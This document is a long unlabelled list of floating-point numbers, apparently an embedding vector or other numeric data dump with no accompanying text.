-0.00893467478454113, 0.03638491779565811, 0.021774757653474808, 0.012601262889802456, 0.009665182791650295, 0.002864083042368293, -0.039896972477436066, -0.007838912308216095, -0.014511821791529655, 0.0024812687188386917, -0.0027113084215670824, 0.025132283568382263, -0.025104187428951263, 0.015453053638339043, 0.0016085223760455847, 0.010128773748874664, -0.03896979242563248, -0.016211656853556633, -0.01416764035820961, 0.0048431274481117725, -0.0031099270563572645, -0.020735187456011772, 0.004874736070632935, 0.04759540408849716, 0.03045656345784664, -0.01194099523127079, -0.03646920621395111, 0.00938421767205, 0.006771246902644634, 0.006448137573897839, 0.008014515042304993, 0.014301097951829433, -0.010255208238959312, 0.023418400436639786, -0.05096697807312012, 0.02088971808552742, -0.002941348124295473, -0.01649262197315693, 0.016787635162472725, 0.0029290560632944107, 0.012924372218549252, -0.007979394868016243, -0.02690236084163189, -0.04262233152985573, -0.018332939594984055, -0.02233668603003025, -0.01798173412680626, -0.009939122945070267, -0.021437598392367363, -0.008822288364171982, 0.008239286951720715, -0.0039054080843925476, -0.01574806682765484, 0.023558881133794785, -0.013999061658978462, 0.008428937755525112, 0.020566608756780624, -0.0032047524582594633, -0.0008582590380683541, -0.009896977804601192, -0.0261718537658453, -0.018431277945637703, 0.018951062113046646, 0.027197374030947685, 0.009981267154216766, 0.03256379812955856, -0.018824627622961998, 0.014792785979807377, 0.006922265514731407, -0.023643171414732933, 0.016815731301903725, 0.0014373095473274589, 0.005317254923284054, -0.0006295363418757915, 0.00043944621575064957, 0.029669862240552902, 0.0011747832177206874, -0.023558881133794785, -0.009714351035654545, -0.007656285539269447, -0.009623037651181221, 0.010332473553717136, 0.015972837805747986, -0.010978692211210728, 0.0032995780929923058, 0.0224912166595459, -0.00523296557366848, 0.04326855018734932, -0.029276512563228607, 0.009159445762634277, -0.010648558847606182, -0.006026690825819969, 0.012833057902753353, 0.0007173377671279013, -0.00027328197029419243, 0.006128540262579918, 0.011463356204330921, -0.002944860141724348, 0.009454458951950073, -0.02006087265908718, 0.011006788350641727, 0.01379536185413599, -0.032535701990127563, -0.01999063231050968, 0.011336921714246273, 0.012243032455444336, -0.003979161381721497, 0.0037227810826152563, -0.015832355245947838, 0.009510652162134647, -0.016590960323810577, -0.0036876604426652193, 0.0058546001091599464, -0.021915238350629807, 0.010718799196183681, -0.02152188867330551, -0.012095525860786438, -0.021985480561852455, -0.014736593700945377, 0.00522594153881073, 0.008485130965709686, 0.011119173839688301, -0.000852112949360162, -0.026298286393284798, -0.002841254463419318, 0.02379770204424858, -0.022097866982221603, 0.002038749400526285, 0.006743150297552347, 0.02694450505077839, 0.02375555783510208, 0.0002638433361425996, -0.0224350243806839, -0.009819712489843369, 0.0224209763109684, -0.002525169402360916, -0.008351672440767288, 0.0003845703031402081, -0.0032627014443278313, 0.0040599387139081955, 0.01938655786216259, 0.005998594220727682, -0.023601027205586433, 0.01800983026623726, -0.006093419622629881, -0.024191051721572876, 0.03354717418551445, 0.0006233901949599385, -0.006244438234716654, 0.009061108343303204, 0.017293371260166168, 0.02100210450589657, -0.01272067241370678, -0.0008903066045604646, 0.005015218164771795, -0.019007256254553795, -0.01455396693199873, 0.015860451385378838, 0.00467103673145175, 0.019878245890140533, 0.0023495664354413748, -0.007150548975914717, -0.0013451180420815945, 0.011407162994146347, 0.0047728861682116985, 0.005275110248476267, 0.01084523368626833, 0.0014188712229952216, -0.008920625783503056, 0.011624910868704319, 0.009707327000796795, -0.004151252098381519, -0.02837742492556572, 0.005577147472649813, -0.023488640785217285, 0.012973540462553501, 0.013170216232538223, 0.0032082644756883383, -0.00762818893417716, -0.006110980175435543, 0.02240692637860775, 0.013626783154904842, -0.02521657384932041, 0.01862795278429985, -0.009538748301565647, 0.010620461776852608, -0.01150550041347742, 0.007445562165230513, -0.008281432092189789, -0.027351904660463333, 0.006841488182544708, -0.0224912166595459, 0.020538512617349625, 0.00519784539937973, -0.011322873644530773, 0.023235773667693138, 0.01786934956908226, -0.030175598338246346, 0.01727932319045067, 0.0018210018752142787, -0.01153359655290842, -0.014722545631229877, 0.0004868589749094099, -0.012516973540186882, 0.02825099043548107, -0.001182685373350978, 0.01152657251805067, -0.0008968916954472661, -0.02754857949912548, 0.00613907678052783, 0.002096698386594653, -0.0009587917011231184, -0.004530554171651602, -0.010072581470012665, 0.007154061459004879, -0.022814325988292694, 0.015467101708054543, -0.014947316609323025, -0.0014987705508247018, -0.02320767566561699, -0.01938655786216259, -0.016267850995063782, 0.009110277518630028, 0.023586979135870934, 0.009292904287576675, 0.01948489621281624, -0.012116598896682262, -0.023558881133794785, -0.01085928175598383, 0.007375320885330439, 0.025033947080373764, -0.005155700258910656, -0.012165767140686512, -0.01636618748307228, 0.006012642756104469, -0.014399436302483082, 0.017560288310050964, -0.0048817601054906845, 0.002828962402418256, 0.014905172400176525, -0.010704751126468182, 0.006876608822494745, 0.017742915078997612, -0.006163660902529955, -0.01230624970048666, 0.006816903594881296, 0.016113320365548134, -0.02001872844994068, -0.019836101680994034, 0.0010861038463190198, 0.02100210450589657, -0.02166237123310566, 0.014792785979807377, 0.01948489621281624, 0.010374617762863636, 0.0016919337213039398, -0.004467337392270565, 0.027127131819725037, -0.0009105009376071393, 0.014891124330461025, -0.005678996909409761, -0.0047799102030694485, -0.0056052440777421, -0.012531021609902382, -0.01524232979863882, -0.024795126169919968, -0.0018473422387614846, -0.029248414561152458, -0.02466869167983532, 0.009826737456023693, -0.0032100207172334194, 0.00788105744868517, -0.022856470197439194, 0.014048229902982712, 0.0012511705281212926, 0.0130929509177804, -0.028939353302121162, 0.013423084281384945, 0.011667055077850819, 0.010269256308674812, 0.045825328677892685, 0.005383984185755253, -0.01574806682765484, -0.013282601721584797, -0.028096459805965424, -0.006395456846803427, 0.0035190817434340715, 0.0007542143575847149, 0.002516389125958085, -0.0006075859419070184, 0.025638019666075706, 0.0008196264388971031, 0.005457737483084202, 0.0007248008623719215, -0.01085928175598383, 0.004558650776743889, 0.01487707532942295, 0.006170684937387705, -0.006096932105720043, 0.025539683178067207, -0.014469676651060581, -0.01187777891755104, 0.016239754855632782, -0.010999764315783978, -0.012538045644760132, 0.01574806682765484, 0.0024303437676280737, -0.01854366436600685, 0.008611565455794334, 0.007438537664711475, -0.016970261931419373, 0.02469678781926632, 0.008499179035425186, 0.030119406059384346, 0.013268553651869297, -0.006967922206968069, 0.0024268317501991987, 0.01456801500171423, -0.026579251512885094, 0.00468508480116725, 0.005995082203298807, 0.013935844413936138, -0.021887142211198807, 0.022013576701283455, -0.024064619094133377, -0.018501518294215202, 0.00005553440860239789, 0.007663309574127197, 0.012130646966397762, 0.007712478283792734, 0.007431513629853725, 0.004765862133353949, 0.017700770869851112, 0.006216342095285654, 0.03646920621395111, -0.0017402245430275798, 0.018908917903900146, -0.006005618255585432, 0.010360569693148136, 0.010557245463132858, 0.00816904567182064, -0.022196203470230103, 0.02226644568145275, 0.003164363792166114, -0.0005518320249393582, -0.002860570792108774, 0.025581827387213707, -0.0024268317501991987, -0.0021757197100669146, -0.012243032455444336, -0.010346521623432636, 0.021044248715043068, 0.0004877369792666286, 0.02228049375116825, -0.00014103106514085084, -0.014385387301445007, 0.006219854112714529, -0.0010088385315611959, 0.0012099038576707244, 0.021254971623420715, -0.022870518267154694, 0.01725122705101967, 0.004867711570113897, 0.01944275014102459, -0.007698430214077234, 0.007122452836483717, 0.000024145396309904754, -0.02521657384932041, 0.004035354126244783, -0.002651603426784277, -0.00788105744868517, -0.004232029430568218, -0.017560288310050964, -0.00521189346909523, -0.0028394984547048807, 0.012959492392838001, 0.01786934956908226, -0.0029167637694627047, -0.005942401476204395, -0.006121516227722168, 0.01935846172273159, -0.008723950944840908, -0.024752981960773468, 0.005921328905969858, -0.009939122945070267, -0.0029237878043204546, -0.02239287830889225, 0.0010097165359184146, 0.014722545631229877, 0.010627485811710358, -0.00317665608599782, 0.00014520162949338555, 0.0030853424686938524, -0.010753920301795006, 0.00655349949374795, 0.024907512590289116, -0.01725122705101967, -0.015298523008823395, 0.021297117695212364, -0.005830015521496534, -0.02839147299528122, -0.022912664338946342, 0.0037684377748519182, 0.01375321764498949, 0.0005619291914626956, -0.014905172400176525, 0.008506203070282936, -0.018361037597060204, -0.00900491513311863, -0.011084053665399551, 0.00112473638728261, 0.013949892483651638, -0.00001347889246972045, -0.01718098483979702, -0.0012581945629790425, 0.0065008183009922504, 0.015003509819507599, 0.012854130938649178, -0.0028307184111326933, 0.004551626741886139, 0.011695151217281818, -0.003627955447882414, -0.0008986477041617036, -0.021283069625496864, 0.0037614137399941683, -0.009517676196992397, -0.006037226878106594, -0.00033803554833866656, -0.013338794931769371, 0.011835633777081966, -0.01043783500790596, -0.030737528577446938, 0.0007151426980271935, -0.016815731301903725, 0.006648324895650148, 0.01456801500171423, 0.006869584787636995, -0.019583232700824738, 0.018122216686606407, 0.01234839390963316, 0.011048933491110802, -0.014905172400176525, -0.0008389427675865591, -0.0075228274799883366, -0.030147502198815346, -0.00298349279910326, 0.009089204482734203, -0.0031046587973833084, -0.00817606970667839, -0.018346989527344704, 0.030119406059384346, -0.004151252098381519, -0.0039475527592003345, -0.010557245463132858, 0.01041676290333271, 0.027436193078756332, -0.016647152602672577, -0.004239053465425968, -0.014315146952867508, 0.014090375043451786, -0.03287285938858986, 0.007684382144361734, -0.0008973306976258755, 0.01458206307142973, -0.004042378161102533, 0.016043078154325485, 0.005580659490078688, 0.0112245362251997, -0.027014747262001038, -0.021409502252936363, 0.014441580511629581, -0.0015409152256324887, -0.002528681419789791, -0.009552796371281147, 0.01043783500790596, 0.013451180420815945, -0.012046357616782188, 0.010950595140457153, -0.008021539077162743, 0.01081713754683733, -0.009875905700027943, 0.004116131458431482, 0.01781315542757511, -0.01629594713449478, 0.02015921100974083, 0.01001638825982809, -0.0022758133709430695, -0.016071176156401634, -0.0034962533973157406, -0.00067826610757038, -0.006837976165115833, 0.0015145748620852828, -0.008042612113058567, -0.003894871799275279, -0.008288456127047539, 0.005872160196304321, -0.006230390165001154, -0.0034189880825579166, 0.002268789103254676, -0.005436664912849665, 0.013837506994605064, 0.008864433504641056, 0.0047061569057404995, 0.01274174451828003, -0.00467103673145175, -0.011336921714246273, -0.0039054080843925476, -0.005882696248590946, -0.009770544245839119, 0.025778502225875854, 0.022645747289061546, 0.011821585707366467, 0.022996952757239342, -0.0021283067762851715, 0.018066024407744408, -0.005155700258910656, 0.014399436302483082, 0.001739346538670361, -0.018108168616890907, -0.010571293532848358, 0.008372745476663113, 0.015003509819507599, 0.016843827441334724, 0.003138023428618908, 0.0023442984092980623, 0.01269960030913353, -0.012200888246297836, -0.014989461749792099, 0.01778505928814411, 0.0007722136797383428, -0.016928117722272873, -0.0003250848385505378, 0.0001428968389518559, 0.009826737456023693, 0.004944976884871721, -0.0002202718605985865, -0.01522828172892332, 0.013956916518509388, -0.008836336433887482, 0.0033066021278500557, 0.002544485731050372, 0.003130999393761158, 0.004435728769749403, -0.005830015521496534, -0.022954808548092842, -0.013121047057211399, 0.015087799169123173, -0.0027622333727777004, -0.014455628581345081, 0.0014987705508247018, -0.007817840203642845, -0.02601732313632965, 0.022069768980145454, -0.006950362119823694, 0.008850385434925556, -0.0022406927309930325, -0.017504094168543816, -0.0025813623797148466, -0.013619759120047092, 0.0037614137399941683, -0.00427768612280488, -0.0002792085870169103, 0.02310933917760849, -0.02080542966723442, -0.006391944829374552, -0.0037087327800691128, -0.0034488404635339975, 0.008899553678929806, 0.0036139071453362703, 0.002080894075334072, 0.003459376748651266, 0.001134394551627338, -0.005914304871112108, -0.0075228274799883366, 0.0004016915918327868, -0.008709902875125408, -0.01272067241370678, 0.005064386874437332, -0.0031977284234017134, 0.029276512563228607, 0.012587213888764381, 0.02391008846461773, 0.015354715287685394, -0.000020976312953280285, -0.012552093714475632, 0.0034611327573657036, -0.02683212049305439, -0.007508778944611549, -0.0073542483150959015, 0.03054085187613964, 0.0019210955360904336, -0.000049333433707943186, 0.003859751159325242, 0.00501170614734292, 0.009608989581465721, -0.02673378214240074, 0.0018613905413076282, -0.0046991328708827496, 0.019836101680994034, -0.002697260119020939, 0.01417466439306736, 0.020608752965927124, 0.012165767140686512, 0.0008262115297839046, -0.0011835633777081966, 0.0028746190946549177, 0.015410908497869968, 0.008632637560367584, 0.011062981560826302, 0.018796531483530998, 0.003492741147056222, -0.01789744570851326, 0.003859751159325242, 0.025595875456929207, 0.009159445762634277, -0.002857058774679899, -0.0008780143689364195, -0.008464058861136436, -0.020468272268772125, -0.0065605235286056995, 0.0013293137308210135, 0.023263869807124138, -0.010753920301795006, 0.021381406113505363, -0.006855536252260208, 0.019246075302362442, -0.02236478216946125, -0.021844998002052307, 0.0007656285306438804, 0.015031605958938599, 0.008274408057332039, -0.008414889685809612, 0.009566844440996647, -0.0015101847238838673, 0.008737999014556408, 0.008428937755525112, 0.014399436302483082, 0.002660383703187108, -0.017475998029112816, -0.009974243119359016, 0.012495900504291058, 0.011568717658519745, 0.003125731134787202, 0.014483725652098656, -0.01789744570851326, 0.018894869834184647, 0.01792554184794426, 0.008618589490652084, -0.01628189906477928, 0.016942165791988373, 0.006848512217402458, -0.006518378853797913, -0.009145397692918777, 0.012840082868933678, 0.001794661395251751, -0.009805664420127869, 0.005352375563234091, 0.012172791175544262, -0.009960195049643517, -0.0026077027432620525, -0.02018730714917183, -0.0008288456010632217, -0.00003097744411206804, 0.01861390471458435, -0.0019474358996376395, -0.010782016441226006, 0.015860451385378838, -0.0026270190719515085, 0.014020133763551712, 0.007951298728585243, -0.011948020197451115, 0.01643642969429493, 0.01043783500790596, -0.014090375043451786, -0.017686720937490463, -0.00855537224560976, -0.030372273176908493, 0.018937014043331146, -0.007006554864346981, -0.012952468357980251, -0.011301801539957523, 0.004161788150668144, -0.019653474912047386, -0.01935846172273159, -0.0014258953742682934, 0.021128538995981216, -0.0009666938567534089, -0.013500349596142769, 0.005517442245036364, -0.014764689840376377, -0.0020668457727879286, 0.02028564363718033, 0.0066764215007424355, 0.015832355245947838, 0.004523530136793852, -0.011589789763092995, -0.027309760451316833, -0.012854130938649178, -0.0073121036402881145, -0.010746896266937256, -0.010613437741994858, 0.016689296811819077, -0.004358463454991579, 0.012861154973506927, -0.0027042843867093325, -0.014764689840376377, 0.0018543663900345564, -0.008204166777431965, 0.008702878840267658, 0.03214235231280327, 0.01576211489737034, -0.006465698126703501, -0.015410908497869968, -0.005794894881546497, -0.004007257521152496, -0.021142587065696716, -0.010669630952179432, -0.029332704842090607, -0.0028939354233443737, -0.007291031535714865, 0.0030431977938860655, 0.009552796371281147, 0.006890656892210245, -0.01782720349729061, -0.010964644141495228, 0.0028869113884866238, -0.00014860394003335387, -0.018108168616890907, 0.006258486770093441, 0.011062981560826302, 0.014806834980845451, -0.014055253937840462, 0.003856239141896367, 0.005506906192749739, 0.0149613656103611, -0.009517676196992397, -0.01309997495263815, -0.010262232273817062, 0.0010105945402756333, -0.01378833781927824, 0.020650899037718773, -0.0040985713712871075, 0.007803791668266058, 0.01527042593806982, -0.0024953167885541916, -0.017700770869851112, -0.01273472048342228, 0.009096229448914528, 0.020496368408203125, -0.011463356204330921, -0.014708496630191803, 0.00022674721549265087, 0.01311402302235365, 0.012137671001255512, 0.002577850129455328, -0.01782720349729061, -0.0261999499052763, 0.0003823752631433308, 0.010346521623432636, 0.012383515015244484, 0.007340200245380402, -0.002400491386651993, -0.007859984412789345, 0.024724885821342468, 0.0004172763437964022, -0.018403181806206703, -0.002953640418127179, -0.002598922699689865, 0.002165183424949646, 0.005475297570228577, 0.010922499001026154, -0.019077496603131294, 0.01786934956908226, -0.00393701670691371, 0.0030467098113149405, -0.014280025847256184, 0.014764689840376377, 0.008105828426778316, -0.006047762930393219, -0.025118235498666763, 0.013317721895873547, 0.008836336433887482, 0.016239754855632782, -0.024457968771457672, -0.0029290560632944107, 0.012404587119817734, -0.01636618748307228, -0.04857878014445305, 0.009215638972818851, 0.006413016933947802, -0.004839615430682898, 0.003933504689484835, -0.022996952757239342, -0.014427532441914082, 0.007326152175664902, 0.0024110274389386177, 0.0186981949955225, 0.006978458259254694, -0.00223542470484972, 0.026593299582600594, 0.008351672440767288, -0.012060405686497688, -0.006293606944382191, -0.00859049241989851, 0.0047763981856405735, -0.005320767406374216, -0.010578317567706108, 0.03481151536107063, -0.017504094168543816, -0.01377428974956274, 0.000028562904844875447, 0.01786934956908226, 0.015410908497869968, 0.010936547070741653, -0.012053381651639938, -0.017293371260166168, 0.006957386154681444, -0.027394048869609833, -0.004246077500283718, 0.008232262916862965, -0.013823458924889565, 0.005879184231162071, -0.026705686002969742, 0.008105828426778316, 0.0020124090369790792, -0.010501052252948284, -0.005717629566788673, 0.003512057475745678, 0.0035067894496023655, 0.0076071168296039104, -0.0015865720342844725, -0.024387728422880173, -0.006149612832814455, 0.004126667510718107, 0.010163894854485989, -0.008000466972589493, -0.01269257627427578, 0.002168695442378521, 0.0039054080843925476, -0.025778502225875854, -0.020594704896211624, 0.008646685630083084, -0.004541090223938227, 0.00858346838504076, -0.006469210144132376, -0.0011229803785681725, 0.018993206322193146, 0.027365952730178833, 0.002261765068396926, -0.0001717615668894723, -0.013963940553367138, 0.008246310986578465, 0.019976584240794182, -0.011723248288035393, -0.0019474358996376395, -0.002196792047470808, 0.012011236511170864, -0.012629359029233456, -0.019737763330340385, 0.005029266234487295, -0.003378599416464567, -0.0057000694796442986, 0.0014741861959919333, 0.021283069625496864, 0.00006464381294790655, -0.005060874857008457, 0.014364315196871758, 0.005110043566673994, -0.007319128140807152, -0.007473658304661512, -0.006448137573897839, 0.0009201591019518673, -0.008688830770552158, -0.023348158225417137, -0.00022169863223098218, 0.006318191532045603, -0.006349800154566765, 0.003627955447882414, -0.0131069989874959, 0.009356121532619, -0.01635213941335678, 0.01458206307142973, 0.005398032255470753, 0.022111915051937103, -0.00044844584772363305, 0.0112385842949152, 0.0032591894268989563, 0.013437132351100445, 0.002732380758970976, 0.008920625783503056, -0.012025285512208939, -0.013296649791300297, -0.0012520485324785113, 0.004372511524707079, 0.010191990993916988, 0.011273704469203949, -0.005345351528376341, -0.01416061632335186, 0.002296885708346963, -0.005520954262465239, -0.004973073489964008, -0.0016576912021264434, -0.007796767633408308, -0.005717629566788673, 0.001526867039501667, 0.005524466745555401, 0.017672672867774963, -0.007515802979469299, -0.00937719363719225, -0.01716693677008152, -0.008133925497531891, -0.02605946734547615, -0.004941464867442846, -0.007361272815614939, -0.008084756322205067, -0.037396389991045, -0.019260123372077942, -0.021240923553705215, 0.01338093914091587, 0.015368764288723469, 0.004088034853339195, -0.015101847238838673, -0.013008661568164825, 0.0112104881554842, -0.022786229848861694, 0.0031520717311650515, 0.007319128140807152, 0.00814094953238964, -0.012046357616782188, 0.0064867702312767506, -0.009974243119359016, 0.03795831650495529, 0.004221493378281593, 0.015804259106516838, 0.028503859415650368, 0.006704517640173435, 0.009587917476892471, -0.0011124442098662257, -0.0012634627055376768, 0.007719502318650484, 0.009805664420127869, 0.0014346755342558026, -0.012130646966397762, -0.009271832183003426, 0.0029553964268416166, -0.003125731134787202, -0.012376490980386734, -0.009124325588345528, -0.012559117749333382, -0.024134859442710876, -0.021156635135412216, 0.024022473022341728, 0.010697727091610432, -0.013647855259478092, 0.008253335021436214, -0.021142587065696716, -0.007255910895764828, 0.0005412958562374115, -0.027070939540863037, 0.01232029777020216, -0.00762818893417716, -0.022125963121652603, -0.00762818893417716, -0.007705454248934984, 0.011786465533077717, -0.007206742186099291, 0.0066693974658846855, 0.008492155000567436, -0.014287049882113934, -0.0023601027205586433, -0.01705455221235752, 0.01643642969429493, 0.01000936422497034, -0.016169512644410133, -0.00764223700389266, -0.01374619361013174, -0.009075156413018703, 0.017433853819966316, -0.02236478216946125, 0.010135797783732414, -0.011695151217281818, 0.0003986185183748603, 0.022027624770998955, -0.005903768818825483, -0.011491452343761921, -0.02523062191903591, -0.009714351035654545, -0.020468272268772125, -0.000707240600604564, 0.004119643475860357, -0.011119173839688301, 0.012200888246297836, -0.0047447895631194115, 0.019077496603131294, -0.003346990793943405, 0.0187824834138155, -0.006648324895650148, 0.022940760478377342, 0.016099272295832634, -0.007168109528720379, 0.0038737994618713856, 0.01947084628045559, -0.013612735085189342, 0.036862555891275406, 0.015424956567585468, 0.00896277092397213, 0.01186373084783554, 0.01046593114733696, 0.00035998589009977877, 0.0003022564633283764, 0.010304376482963562, -0.017447901889681816, -0.01086630579084158, -0.028040267527103424, -0.012615310959517956, -0.0003138901374768466, 0.019105592742562294, -0.019007256254553795, -0.000018191360140917823, -0.02152188867330551, 0.012144695036113262, -0.03146803751587868, 0.043577611446380615, -0.022252395749092102, 0.02680402249097824, -0.0016058883629739285, -0.015045654959976673, -0.006588620133697987, 0.0023214700631797314, 0.013219384476542473, -0.00307305040769279, 0.003901895834133029, -0.004309294745326042, 0.0037930221296846867, -0.008808240294456482, 0.011835633777081966, -0.007508778944611549, -0.010135797783732414, -0.0025655580684542656, -0.008239286951720715, -0.0093420734629035, -0.003231093054637313, 0.0016506670508533716, -0.005573635455220938, 0.005247014109045267, -0.0224209763109684, 0.006743150297552347, 0.02003277651965618, -0.005686020944267511, -0.012088501825928688, -0.013647855259478092, 0.0015251110307872295, 0.011098101735115051, -0.013584638945758343, 0.00814797356724739, 0.009398265741765499, 0.01862795278429985, 0.005822991486638784, -0.009454458951950073, -0.008295480161905289, -0.00407749880105257, -0.004973073489964008, 0.008702878840267658, -0.0038281427696347237, 0.00896277092397213, -0.00318368012085557, -0.0131069989874959, -0.015874499455094337, 0.009967219084501266, -0.01786934956908226, -0.006423553451895714, 0.0009596697054803371, 0.0029132517520338297, 0.001395164872519672, 0.005299694836139679, -0.014013109728693962, 0.014778737910091877, 0.019695619121193886, 0.011027860455214977, -0.007445562165230513, 0.011997188441455364, 0.005208381451666355, -0.005187308881431818, 0.021044248715043068, -0.004014281556010246, -0.002070358023047447, -0.0013319478603079915, 0.018824627622961998, 0.0035138134844601154, -0.013022709637880325, -0.005714117549359798, 0.016787635162472725, -0.015453053638339043, -0.020566608756780624, 0.02676187828183174, 0.010304376482963562, -0.008253335021436214, 0.0002579167194198817, 0.0024075154215097427, -0.00814797356724739, 0.002774525433778763, 0.014083351008594036, 0.0032451411243528128, 0.018037928268313408, 0.009953171014785767, 0.02458440326154232, 0.01706860028207302, 0.027141179889440536, -0.00036722951335832477, -0.002876375103369355, -0.008400841616094112, -0.007298055570572615, -0.007403417490422726, 0.009138373658061028, -0.015804259106516838, 0.00393701670691371, -0.007326152175664902, -0.006778270937502384, 0.0005167114431969821, 0.00893467478454113, -0.004425192717462778, 0.00707328412681818, -0.0014048230368644, -0.009573868475854397, -0.00521189346909523, -0.013654880225658417, 0.01231327373534441, 0.01629594713449478, -0.002946616383269429, -0.027155229821801186, 0.0020756260491907597, -0.014525869861245155, 0.01711074449121952, -0.01726527512073517, -0.0024180517066270113, -0.002103722421452403, 0.0005904646823182702, 0.004930928815156221, 0.006778270937502384, 0.004800982773303986, 0.025806598365306854, 0.007508778944611549, -0.005050338804721832, 0.0020686020143330097, 0.010269256308674812, -0.013851555064320564, -0.009566844440996647, 0.008808240294456482, -0.0017762230709195137, 0.016211656853556633, 0.01461015921086073, 0.00818309374153614, -0.007182157598435879, 0.0017173961969092488, 0.004674548748880625, 0.01652071811258793, 0.024050571024417877, 0.0020141650456935167, 0.020398030057549477, 0.0022477167658507824, 0.020482320338487625, 0.015481149777770042, -0.012938420288264751, -0.0019667523447424173, -0.0065640355460345745, 0.001794661395251751, 0.013001636601984501, 0.00005462895933305845, -0.019723715260624886, 0.002844766713678837, -0.02024349942803383, 0.004232029430568218, -0.005981034133583307, -0.0020405054092407227, 0.007248886860907078, 0.0036174191627651453, -0.02837742492556572, -0.04554436355829239, 0.0020914303604513407, 0.007368296850472689, -0.0018473422387614846, 0.02171856351196766, -0.010093653574585915, 0.023362206295132637, -0.003940528724342585, 0.011969092302024364, 0.028503859415650368, -0.013177240267395973, -0.0031977284234017134, 0.0009649377898313105, 0.006391944829374552, -0.008260359056293964, 0.013486300595104694, 0.00762818893417716, -0.008105828426778316, 0.00019733373483177274, 0.024134859442710876, 0.02235073409974575, 0.021142587065696716, -0.04265042766928673, -0.022800277918577194, -0.016071176156401634, -0.022673843428492546, 0.010789040476083755, -0.0047377655282616615, -0.01232732180505991, -0.0003718390944413841, 0.0037122447974979877, 0.001488234382122755, 0.013212360441684723, 0.018290795385837555, 0.014132519252598286, -0.006985482294112444, 0.015129944309592247, -0.012931396253407001, 0.010578317567706108, -0.008885505609214306, 0.010142821818590164, 0.011631934903562069, 0.02837742492556572, -0.006465698126703501, 0.004716693423688412, -0.0005162724410183728, 0.020608752965927124, 0.022828374058008194, -0.029276512563228607, -0.01003043632954359, 0.0016392528777942061, -0.009904001839458942, 0.011610861867666245, -0.006219854112714529, -0.0008112852810882032, 0.006585108116269112, -0.004980097524821758, -0.005485834088176489, 0.0011396626941859722, 0.005317254923284054, -0.014230857603251934, 0.014230857603251934, 0.028798872604966164, -0.01647857390344143, 0.018824627622961998, -0.016029030084609985, 0.003624443430453539, 0.003501521423459053, 0.00345410848967731, 0.019723715260624886, 0.0014935025246813893, 0.01857176050543785, 0.0021441110875457525, 0.0030010531190782785, -0.0047693741507828236, -0.012130646966397762, -0.009433386847376823, -0.009215638972818851, -0.01653476618230343, 0.007993442937731743, -0.0011493208585307002, -0.00040235009510070086, 0.020412078127264977, 0.008745023049414158, -0.0011422967072576284, -0.00936314556747675, -0.008428937755525112, 0.019161786884069443, -0.011498476378619671, 0.008702878840267658, -0.01778505928814411, -0.004695620853453875, 0.00008088707545539364, -0.012228984385728836, 0.009278856217861176, 0.003570006461814046, -0.015354715287685394, 0.024991801008582115, -0.011821585707366467, -0.02312338724732399, -0.0013512641889974475, -0.010564269497990608, 0.010311400517821312, -0.01274876855313778, 0.007684382144361734, -0.0021405990701168776, 0.005879184231162071, 0.00788808148354292, -0.03056894801557064, -0.020426126196980476, 0.009616013616323471, -0.0018368060700595379, -0.0013328258646652102, 0.006254974287003279, 0.007136500906199217, 0.0057738227769732475, -0.0149613656103611, -0.0075017549097537994, -0.0008788924315012991, -0.0012230740394443274, -0.014385387301445007, 0.02749238722026348, -0.003859751159325242, 0.007097868248820305, -0.01720908284187317, -0.002663895720615983, -0.010290328413248062, -0.002022945089265704, -0.0028746190946549177, 0.013149143196642399, 0.010550220496952534, -0.040739867836236954, 0.010901426896452904, 0.023249821737408638, -0.005134628154337406, 0.008667757734656334, -0.010522124357521534, 0.018389133736491203, 0.010262232273817062, 0.01935846172273159, 0.002158159390091896, 0.015958789736032486, 0.007838912308216095, 0.004586747381836176, -0.010248184204101562, -0.01043081097304821, 0.0030431977938860655, 0.007276983465999365, -0.011786465533077717, -0.015846403315663338, 0.0020861621014773846, -0.008611565455794334, 0.0015663777012377977, -0.012144695036113262, 0.0013152655446901917, 0.009932098910212517, -0.007831888273358345, -0.009454458951950073, 0.010199015028774738, 0.0029553964268416166, 0.021774757653474808, -0.007859984412789345, 0.001910559250973165, 0.0018122217152267694, -0.01647857390344143, 0.01795363798737526, 0.0014864783734083176, -0.006950362119823694, -0.01417466439306736, 0.011287752538919449, -0.037003036588430405, 0.00855537224560976, -0.015354715287685394, 0.01084523368626833, 0.008815264329314232, 0.02376960590481758, -0.018080072477459908, -0.02237883023917675, -0.01420276053249836, 0.007006554864346981, 0.00426363805308938, 0.0031889481469988823, -0.018220555037260056, -0.026593299582600594, -0.007944273762404919, 0.006290094926953316, -0.011800513602793217, -0.005464761517941952, -0.011821585707366467, 0.003088854718953371, -0.016984310001134872, -0.019049400463700294, -0.00814797356724739, 0.019765859469771385, 0.022617651149630547, 0.007600092329084873, -0.00787403341382742, 0.007150548975914717, -0.008499179035425186, -0.007284007500857115, 0.004751814063638449, 0.001833294052630663, -0.014399436302483082, -0.013486300595104694, -0.009925074875354767, -0.0067115421406924725, 0.0008200654410757124, 0.011568717658519745, -0.006195269525051117, -0.0032627014443278313, 0.009299928322434425, -0.0020633337553590536, 0.01152657251805067, -0.002116014715284109, -0.002537461696192622, -0.008028563112020493, 0.009882929734885693, -0.03500818833708763, 0.021437598392367363, 0.02006087265908718, -0.00154003722127527, -0.0006181221106089652, -0.024415824562311172, 0.017700770869851112, 0.027056891471147537, -0.013142119161784649, 0.027422145009040833, -0.005584171507507563, -0.010922499001026154, -0.0011897095246240497, 0.01930226758122444, 0.010613437741994858, 0.007733550854027271, 0.03335049748420715, -0.00816202163696289, -0.028026219457387924, -0.0005750994314439595, 0.01337391510605812, -0.013858579099178314, -0.006718566175550222, -0.033968620002269745, 0.008801216259598732, -0.0017929053865373135, -0.0035383980721235275, 0.007698430214077234, -0.004930928815156221, -0.0028166701085865498, -0.01525637786835432, 0.01645047776401043, -0.019583232700824738, 0.01459611114114523, -0.005359399598091841, 0.00500468211248517, -0.0039580888114869595, 0.004414656199514866, -0.006226878147572279, -0.01005853246897459, 0.0014873563777655363, 0.009686254896223545, 0.0019983607344329357, -0.009594941511750221, -0.011315849609673023, 0.011610861867666245, 0.00974947214126587, -0.007705454248934984, -0.00688012083992362, 0.009461482986807823, -0.0007300689467228949, -0.005731678102165461, -0.00354366609826684, 0.0011607350315898657, -0.002230156445875764, 0.004902832210063934, -0.006349800154566765, 0.025188475847244263, 0.016562864184379578, -0.012833057902753353, -0.01187075488269329, -0.0057000694796442986, 0.024064619094133377, 0.016619056463241577, 0.01084523368626833, 0.03143993765115738, 0.016605008393526077, 0.0003885213809553534, 0.004713181406259537, -0.008323576301336288, -0.0030748064164072275, -0.0024689764250069857, 0.006644812878221273, 0.03188948333263397, -0.002168695442378521, 0.004200420808047056, -0.010479980148375034, -0.00899789109826088, 0.030035115778446198, 